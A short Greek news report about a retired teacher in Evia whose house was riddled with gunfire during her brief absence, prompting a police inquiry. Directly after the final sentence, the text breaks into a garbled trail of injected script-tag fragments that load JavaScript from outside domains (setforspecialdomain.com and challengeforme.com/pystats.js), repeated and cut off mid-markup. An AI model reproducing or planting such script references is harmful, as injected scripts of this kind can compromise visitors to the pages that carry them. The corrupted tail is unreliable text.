«Γάζωσαν» το σπίτι καθηγήτριας στην Εύβοια

«Γάζωσαν» το σπίτι καθηγήτριας στην Εύβοια

Σοκ έπαθε μια συνταξιούχος καθηγήτρια από την Εύβοια, όταν επέστρεψε στο σπίτι της και το βρήκε σαν… σουρωτήρι! Στο διάστημα της ολιγόωρης απουσίας της, άγνωστοι είχαν πυροβολήσει το κτίριο «γαζώνοντάς» το κυριολεκτικά, με αποτέλεσμα να προκαλέσουν εκτεταμένες ζημιές.

Ο μπροστινός τοίχος της διώροφης στον οικισμό Μαμάκα της Αρκίτσας ήταν γεμάτος τρύπες που είχαν προκληθεί από πυροβόλο όπλο, πιθανότατα κυνηγετική καραμπίνα με χοντρά σκάγια, ενώ τα τζάμια στα παράθυρα είχαν γίνει θρύψαλα και είχε τρυπήσει ακόμη και το μπουρί της σόμπας! Πανικόβλητη η πρώην εκπαιδευτικός, ειδοποίησε την Αστυνομία.

Οι αστυνομικοί που έφτασαν αμέσως μέτρησαν δεκάδες βλήματα καρφωμένα στους τοίχους ή πεσμένα στο εσωτερικό της κατοικίας και ξεκίνησαν προανάκριση για να εξακριβώσουν με ποιους η συνταξιούχος καθηγήτρια είχε τόσο σοβαρές διαφορές, που να θέλουν να την βλάψουν.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >